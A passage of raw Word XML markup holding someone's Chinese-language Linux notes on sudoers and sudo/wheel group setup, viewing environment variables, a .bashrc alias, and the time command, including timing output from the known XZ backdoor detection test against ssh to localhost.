        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许用户组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>youuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面的用户执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且在执行的时候不输入密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E63CE17" w14:textId="5C74F011" w:rsidR="00D4446D" w:rsidRDefault="00D4446D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2A938C" w14:textId="0643A1BC" w:rsidR="00AA3B3A" w:rsidRDefault="00AA3B3A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA3B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>然后减少所用用户对此的写权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C49E0D6" w14:textId="7706C265" w:rsidR="00D4446D" w:rsidRDefault="005927D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005927D8">
        <w:t>chmod u-w /etc/sudoers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D43AD7D" w14:textId="58638567" w:rsidR="001B14F9" w:rsidRDefault="001B14F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0196F5" w14:textId="09DCF45A" w:rsidR="001B14F9" w:rsidRDefault="001B14F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下的方法，我是没有在</w:t>
      </w:r>
      <w:r>
        <w:t>ubuntu22.04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>etc/group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的组，修改失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ECB00A" w14:textId="77777777" w:rsidR="00B07308" w:rsidRDefault="00B07308" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">su root </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F94C8" w14:textId="457BA854" w:rsidR="00B07308" w:rsidRPr="007277CC" w:rsidRDefault="00B07308" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /etc/sudoers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后添加下面的一行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A47BE2" w14:textId="02D14B6E" w:rsidR="00337BC8" w:rsidRDefault="00B07308" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B07308">
        <w:lastRenderedPageBreak/>
        <w:t>user_name ALL=(ALL)  ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC0B5D" w14:textId="263CB6CB" w:rsidR="00337BC8" w:rsidRDefault="00337BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46298252" w14:textId="371B8337" w:rsidR="005B1334" w:rsidRDefault="005B1334" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就目前而言，上述答案都是正确的，但是将您的用户添加到基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> debian </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的系统（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kbuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">debian </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组和基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> RedHat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的系统（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RedHat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fedora</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CentOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> wheel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组更容易，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ETC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41796A11" w14:textId="77777777" w:rsidR="005B1334" w:rsidRDefault="005B1334" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E6E5B1" w14:textId="77777777" w:rsidR="005B1334" w:rsidRDefault="005B1334" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>usermod -a -G sudo user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A069722" w14:textId="77777777" w:rsidR="005B1334" w:rsidRDefault="005B1334" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D5295" w14:textId="49E0D967" w:rsidR="00337BC8" w:rsidRDefault="005B1334" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>usermod -a -G wheel user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D079678" w14:textId="77777777" w:rsidR="00337BC8" w:rsidRDefault="00337BC8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E7539A" w14:textId="6898B5BD" w:rsidR="004E77FD" w:rsidRPr="00D50FCD" w:rsidRDefault="00D50FCD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Toc159779653"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印环境变量：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>rintenv,env</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="09F37C9B" w14:textId="440CC47C" w:rsidR="00D50FCD" w:rsidRDefault="00D50FCD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38DA9CF8" w14:textId="4B92E83A" w:rsidR="003B036B" w:rsidRDefault="006709B0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE3CDF6" w14:textId="3FF5BF3E" w:rsidR="006709B0" w:rsidRDefault="006709B0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B67A66" w14:textId="580008BC" w:rsidR="006709B0" w:rsidRDefault="006709B0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到当前的环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52625ABE" w14:textId="22400204" w:rsidR="003B036B" w:rsidRDefault="003B036B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9A28E0" w14:textId="77777777" w:rsidR="003B036B" w:rsidRDefault="003B036B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2877E8" w14:textId="7B6A34D0" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_Toc159779654"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.bashrc</w:t>
      </w:r>
      <w:r w:rsidR="00E233A9">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E233A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户登录初始会加载更改环境变量的脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p w14:paraId="678CF55E" w14:textId="347902BA" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以彩色输出，通常会写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00991885">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>alias ls='ls --color=auto'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8153BB" w14:textId="5D67B964" w:rsidR="00746879" w:rsidRDefault="0057663B" w:rsidP="0057663B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1971D7CD" w14:textId="56C4738D" w:rsidR="0057663B" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>XZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>后门大佬的测试命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1844081F" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBCB90C" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>time ssh nonexistant@...alhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FAE2C8" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11042DF4" w14:textId="04F841A4" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68639206" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nonexistant@...alhost: Permission denied (publickey).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5ECB6" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B6D79C" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A5F2E" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real</w:t>
      </w:r>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>0m0.299s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA22395" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>0m0.202s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363BC3A0" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>0m0.006s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCCA951" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F885A40" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB0A36" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nonexistant@...alhost: Permission denied (publickey).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C3A5F6" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC2C13B" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real</w:t>
      </w:r>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>0m0.807s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437BDFBB" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>0m0.202s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242E6F9" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidRPr="00E619E5">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>0m0.006s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A0E297" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="0057663B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B6DDD0" w14:textId="2AA1A095" w:rsidR="00E619E5" w:rsidRPr="0057663B" w:rsidRDefault="00E619E5" w:rsidP="0057663B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>命令本身</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A24012" w14:textId="77777777" w:rsidR="00E619E5" w:rsidRPr="00E619E5" w:rsidRDefault="00E619E5" w:rsidP="00E619E5">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E619E5">
        <w:t>time [options] COMMAND [arguments]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F220DD8" w14:textId="77777777" w:rsidR="0057663B" w:rsidRDefault="0057663B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2DBE5F" w14:textId="77777777" w:rsidR="0057663B" w:rsidRDefault="0057663B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2F04C2" w14:textId="5ECEDCFB" w:rsidR="00CE509C" w:rsidRDefault="00CE509C" w:rsidP="00CE509C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>输出的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>real user sys</w:t>
      </w:r>
